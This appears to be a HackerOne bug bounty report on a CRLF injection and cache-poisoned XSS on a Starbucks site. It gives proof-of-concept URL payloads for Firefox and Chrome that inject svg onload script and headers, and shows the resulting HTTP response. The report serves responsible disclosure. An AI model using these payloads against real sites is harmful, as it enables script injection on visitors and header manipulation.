Starbucks: [] CRLF Injection, XSS

ID H1:192749
Type hackerone
Reporter bobrov
Modified 2017-03-09T03:31:53


PoC (FireFox)<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e

After sending the request through FireFox this query is saved in cache and using a small trick can be made to work it in another browser.

PoC (Chrome) Make sure you send this request after FireFox and previous http response contained the header X-Cache: HIT<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e

HTTP Response ```http HTTP/1.1 200 OK Date: Tue, 20 Dec 2016 14:34:03 GMT Content-Type: text/html; charset=utf-8 Content-Length: 22907 Connection: close X-Frame-Options: SAMEORIGIN Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT ETag: "842fe-597b-54415a5c97a80" Vary: Accept-Encoding X-UA-Compatible: IE=edge Server: NetDNA-cache/2.2 Link: < Content-Length:35 X-XSS-Protection:0

23 <svg onload=alert(document.domain)> 0 ```